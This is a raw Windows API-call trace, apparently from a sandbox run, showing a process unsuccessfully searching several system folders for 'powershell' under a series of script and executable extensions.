	[0603.233] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.233] SetErrorMode (uMode=0x1) returned 0x1
	[0603.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.233] SetErrorMode (uMode=0x1) returned 0x1
	[0603.233] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.234] SetErrorMode (uMode=0x1) returned 0x1
	[0603.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0603.234] SetErrorMode (uMode=0x1) returned 0x1
	[0603.234] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.234] SetErrorMode (uMode=0x1) returned 0x1
	[0603.234] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.235] SetErrorMode (uMode=0x1) returned 0x1
	[0603.235] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.235] SetErrorMode (uMode=0x1) returned 0x1
	[0603.235] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.235] SetErrorMode (uMode=0x1) returned 0x1
	[0603.235] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.236] SetErrorMode (uMode=0x1) returned 0x1
	[0603.236] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.236] SetErrorMode (uMode=0x1) returned 0x1
	[0603.236] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.236] SetErrorMode (uMode=0x1) returned 0x1
	[0603.236] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.237] SetErrorMode (uMode=0x1) returned 0x1
	[0603.237] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.237] SetErrorMode (uMode=0x1) returned 0x1
	[0603.237] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.237] SetErrorMode (uMode=0x1) returned 0x1
	[0603.238] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.238] SetErrorMode (uMode=0x1) returned 0x1
	[0603.238] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.238] SetErrorMode (uMode=0x1) returned 0x1
	[0603.238] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.238] SetErrorMode (uMode=0x1) returned 0x1
	[0603.239] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.239] SetErrorMode (uMode=0x1) returned 0x1
	[0603.239] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.239] SetErrorMode (uMode=0x1) returned 0x1
	[0603.239] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.239] SetErrorMode (uMode=0x1) returned 0x1
	[0603.240] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.240] SetErrorMode (uMode=0x1) returned 0x1
	[0603.240] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.240] SetErrorMode (uMode=0x1) returned 0x1
	[0603.240] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.240] SetErrorMode (uMode=0x1) returned 0x1
	[0603.241] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.241] SetErrorMode (uMode=0x1) returned 0x1
	[0603.241] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.241] SetErrorMode (uMode=0x1) returned 0x1
	[0603.241] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.242] SetErrorMode (uMode=0x1) returned 0x1
	[0603.242] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.242] SetErrorMode (uMode=0x1) returned 0x1
	[0603.242] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.242] SetErrorMode (uMode=0x1) returned 0x1
	[0603.242] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.243] SetErrorMode (uMode=0x1) returned 0x1
	[0603.243] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.243] SetErrorMode (uMode=0x1) returned 0x1
	[0603.243] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.243] SetErrorMode (uMode=0x1) returned 0x1
	[0603.243] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.244] SetErrorMode (uMode=0x1) returned 0x1
	[0603.244] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.244] SetErrorMode (uMode=0x1) returned 0x1
	[0603.244] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0603.244] SetErrorMode (uMode=0x1) returned 0x1
	[0603.244] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.245] SetErrorMode (uMode=0x1) returned 0x1
	[0603.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.245] SetErrorMode (uMode=0x1) returned 0x1
	[0603.245] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.245] SetErrorMode (uMode=0x1) returned 0x1
	[0603.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.246] SetErrorMode (uMode=0x1) returned 0x1
	[0603.246] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.246] SetErrorMode (uMode=0x1) returned 0x1
	[0603.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.246] SetErrorMode (uMode=0x1) returned 0x1
	[0603.247] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.247] SetErrorMode (uMode=0x1) returned 0x1
	[0603.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.247] SetErrorMode (uMode=0x1) returned 0x1
	[0603.247] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.247] SetErrorMode (uMode=0x1) returned 0x1
	[0603.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.248] SetErrorMode (uMode=0x1) returned 0x1
	[0603.248] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.248] SetErrorMode (uMode=0x1) returned 0x1
	[0603.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.248] SetErrorMode (uMode=0x1) returned 0x1
	[0603.249] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.249] SetErrorMode (uMode=0x1) returned 0x1
	[0603.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.249] SetErrorMode (uMode=0x1) returned 0x1
	[0603.249] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.250] SetErrorMode (uMode=0x1) returned 0x1
	[0603.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.250] SetErrorMode (uMode=0x1) returned 0x1
	[0603.250] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.250] SetErrorMode (uMode=0x1) returned 0x1
	[0603.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.251] SetErrorMode (uMode=0x1) returned 0x1
	[0603.251] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.251] SetErrorMode (uMode=0x1) returned 0x1
	[0603.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.251] SetErrorMode (uMode=0x1) returned 0x1
	[0603.251] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.252] SetErrorMode (uMode=0x1) returned 0x1
	[0603.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.252] SetErrorMode (uMode=0x1) returned 0x1
	[0603.252] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.252] SetErrorMode (uMode=0x1) returned 0x1
	[0603.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.253] SetErrorMode (uMode=0x1) returned 0x1
	[0603.253] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.253] SetErrorMode (uMode=0x1) returned 0x1
	[0603.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0603.253] SetErrorMode (uMode=0x1) returned 0x1
	[0603.254] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c84da60 | out: lpFindFileData=0x1c84da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0603.254] SetErrorMode (uMode=0x1) returned 0x1
